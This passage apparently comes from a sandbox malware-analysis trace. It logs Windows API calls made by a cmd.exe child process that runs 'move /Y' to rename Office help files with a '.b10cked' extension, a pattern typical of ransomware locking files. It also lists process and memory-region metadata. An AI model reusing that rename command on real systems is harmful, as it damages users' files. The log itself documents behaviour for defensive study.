lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x40, lpcbData=0x28e6e8*=0x4) returned 0x0 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x40, lpcbData=0x28e6e8*=0x4) returned 0x0 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x0, lpData=0x28e6f0*=0x40, lpcbData=0x28e6e8*=0x1000) returned 0x2 [0202.446] RegCloseKey (hKey=0x40) returned 0x0 [0202.446] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e6e4 | out: phkResult=0x28e6e4*=0x40) returned 0x0 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x0, lpData=0x28e6f0*=0x40, lpcbData=0x28e6e8*=0x1000) returned 0x2 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x1, lpcbData=0x28e6e8*=0x4) returned 0x0 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x0, lpData=0x28e6f0*=0x1, lpcbData=0x28e6e8*=0x1000) returned 0x2 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x0, lpcbData=0x28e6e8*=0x4) returned 0x0 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x9, lpcbData=0x28e6e8*=0x4) returned 0x0 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x4, lpData=0x28e6f0*=0x9, lpcbData=0x28e6e8*=0x4) returned 0x0 [0202.446] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e6ec, lpData=0x28e6f0, lpcbData=0x28e6e8*=0x1000 | out: lpType=0x28e6ec*=0x0, lpData=0x28e6f0*=0x9, lpcbData=0x28e6e8*=0x1000) returned 0x2 [0202.446] RegCloseKey (hKey=0x40) returned 0x0 [0202.446] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a4 [0202.446] srand (_Seed=0x5b8863a4) [0202.446] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.14.1033.hxn.b10cked\"" [0202.446] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.14.1033.hxn.b10cked\"" [0202.446] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.447] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x818e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.447] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.447] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.447] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.447] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.447] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.447] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.447] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.447] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.447] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.447] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.447] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.447] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.447] GetEnvironmentStringsW () returned 0x822d0* [0202.447] FreeEnvironmentStringsW (penv=0x822d0) returned 1 [0202.447] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.447] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.447] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.447] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.447] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.447] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.447] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.447] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.447] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.447] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.447] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f4b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.447] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f4b0, lpFilePart=0x28f4ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f4ac*="Desktop") returned 0x18 [0202.448] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.448] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f22c | out: lpFindFileData=0x28f22c) returned 0x80010 [0202.448] FindClose (in: hFindFile=0x80010 | out: hFindFile=0x80010) returned 1 [0202.448] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f22c | out: lpFindFileData=0x28f22c) returned 0x80010 [0202.448] FindClose (in: hFindFile=0x80010 | out: hFindFile=0x80010) returned 1 [0202.448] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f22c | out: lpFindFileData=0x28f22c) returned 0x80010 [0202.448] FindClose (in: hFindFile=0x80010 | out: hFindFile=0x80010) returned 1 [0202.448] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.448] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.448] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.448] GetEnvironmentStringsW () returned 0x82af0* [0202.448] FreeEnvironmentStringsW (penv=0x82af0) returned 1 [0202.449] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.449] GetConsoleOutputCP () returned 0x1b5 [0202.449] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.450] GetUserDefaultLCID () returned 0x409 [0202.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0202.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f5f0, cchData=128 | out: lpLCData="0") returned 2 [0202.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f5f0, cchData=128 | out: lpLCData="0") returned 2 [0202.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f5f0, cchData=128 | out: lpLCData="1") returned 2 [0202.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.450] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0202.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0202.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.451] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.451] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.451] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0202.451] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.452] GetConsoleTitleW (in: lpConsoleTitle=0x708e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.452] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.452] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0202.452] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.452] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.453] _wcsicmp (_String1="move", _String2=")") returned 68 [0202.453] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0202.453] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0202.453] _wcsicmp (_String1="IF", _String2="move") returned -4 [0202.453] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0202.453] _wcsicmp (_String1="REM", _String2="move") returned 5 [0202.453] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0202.455] GetConsoleTitleW (in: lpConsoleTitle=0x28f2e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.456] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0202.456] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0202.456] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0202.456] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0202.456] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0202.456] _wcsicmp (_String1="move", _String2="CD") returned 10 [0202.456] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0202.456] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0202.456] _wcsicmp (_String1="move", _String2="REN") returned -5 [0202.456] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0202.456] _wcsicmp (_String1="move", _String2="SET") returned -6 [0202.456] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0202.456] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0202.456] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0202.456] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0202.456] _wcsicmp (_String1="move", _String2="MD") returned 11 [0202.456] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0202.456] _wcsicmp (_String1="move", _String2="RD") returned -5 [0202.456] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0202.456] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0202.456] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0202.456] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0202.456] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0202.456] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0202.456] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0202.456] _wcsicmp (_String1="move", _String2="VER") returned -9 [0202.456] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0202.456] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0202.456] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0202.456] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0202.456] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0202.456] _wcsicmp (_String1="move", _String2="START") returned -6 [0202.456] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0202.456] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0202.456] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0202.458] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.458] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.458] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x28f0a4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x28f09c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x28f09c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.458] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0202.459] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0202.459] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0202.459] _wcsicmp (_String1="MSWINW~1.HXN", _String2=".") returned 63 [0202.459] _wcsicmp (_String1="MSWINW~1.HXN", _String2="..") returned 63 [0202.459] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mswinw~1.hxn")) returned 0x2022 [0202.459] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x81e40 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.459] SetErrorMode (uMode=0x0) returned 0x0 [0202.460] SetErrorMode (uMode=0x1) returned 0x0 [0202.460] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN", nBufferLength=0x104, lpBuffer=0x28ea2c, lpFilePart=0x28ea14 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN", lpFilePart=0x28ea14*="MSWINW~1.HXN") returned 0x27 [0202.460] SetErrorMode (uMode=0x0) returned 0x1 [0202.460] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0202.460] _wcsicmp (_String1="MSWINW~1.HXN", _String2=".") returned 63 [0202.460] _wcsicmp (_String1="MSWINW~1.HXN", _String2="..") returned 63 [0202.460] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\mswinw~1.hxn")) returned 0x2022 [0202.460] SetErrorMode (uMode=0x0) returned 0x0 [0202.460] SetErrorMode (uMode=0x1) returned 0x0 [0202.460] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN", nBufferLength=0x104, lpBuffer=0x28eea8, lpFilePart=0x28ec40 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN", lpFilePart=0x28ec40*="MSWINW~1.HXN") returned 0x27 [0202.460] SetErrorMode (uMode=0x0) returned 0x1 [0202.460] SetErrorMode (uMode=0x0) returned 0x0 [0202.460] SetErrorMode (uMode=0x1) returned 0x0 [0202.460] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x28f0b0, lpFilePart=0x28ec40 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.14.1033.hxn.b10cked", lpFilePart=0x28ec40*="MS.WINWORD.14.1033.hxn.b10cked") returned 0x39 [0202.460] SetErrorMode (uMode=0x0) returned 0x1 [0202.460] SetLastError (dwErrCode=0x0) [0202.460] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.winword.14.1033.hxn.b10cked")) returned 0xffffffff [0202.460] GetLastError () returned 0x2 [0202.460] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x28e5bc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e5bc) returned 0x70e70 [0202.461] FindNextFileW (in: hFindFile=0x70e70, lpFindFileData=0x28e5bc | out: lpFindFileData=0x28e5bc) returned 0 [0202.461] FindClose (in: hFindFile=0x70e70 | out: hFindFile=0x70e70) returned 1 [0202.461] GetLastError () returned 0x12 [0202.461] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x28e5bc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28e5bc) returned 0x70e70 [0202.461] FindNextFileW (in: hFindFile=0x70e70, lpFindFileData=0x28e5bc | out: lpFindFileData=0x28e5bc) returned 0 [0202.461] FindClose (in: hFindFile=0x70e70 | out: hFindFile=0x70e70) returned 1 [0202.461] GetLastError () returned 0x12 [0202.462] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x81be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x81be0) returned 0x70e70 [0202.462] FindNextFileW (in: hFindFile=0x70e70, lpFindFileData=0x81be0 | out: lpFindFileData=0x81be0) returned 0 [0202.462] FindClose (in: hFindFile=0x70e70 | out: hFindFile=0x70e70) returned 1 [0202.462] GetLastError () returned 0x12 [0202.462] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x81be0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x81be0) returned 0x70e70 [0202.462] FindNextFileW (in: hFindFile=0x70e70, lpFindFileData=0x81be0 | out: lpFindFileData=0x81be0) returned 0 [0202.462] FindClose (in: hFindFile=0x70e70 | out: hFindFile=0x70e70) returned 1 [0202.463] GetLastError () returned 0x12 [0202.463] _get_osfhandle (_FileHandle=2) returned 0xb [0202.463] GetFileType (hFile=0xb) returned 0x2 [0202.660] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0202.660] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28e78c | out: lpMode=0x28e78c) returned 1 [0202.660] _get_osfhandle (_FileHandle=2) returned 0xb [0202.660] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x28e7c0 | out: lpConsoleScreenBufferInfo=0x28e7c0) returned 1 [0202.660] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.661] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x28e800 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0202.662] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x28e7e4, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x28e7e4*=0x2c) returned 1 [0202.662] longjmp () [0202.662] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.662] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.662] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.662] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.662] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.662] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.662] SetConsoleInputExeNameW () returned 0x1 [0202.662] GetConsoleOutputCP () returned 0x1b5 [0202.662] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.662] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.663] exit (_Code=1) Process: id = "485" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16aa0" os_pid = "0xe6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSWINW~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.WINWORD.DEV.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29461 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29462 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29463 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29464 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 29465 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29466 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29467 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29468 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29469 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 29470 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30014 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30015 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30016 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") 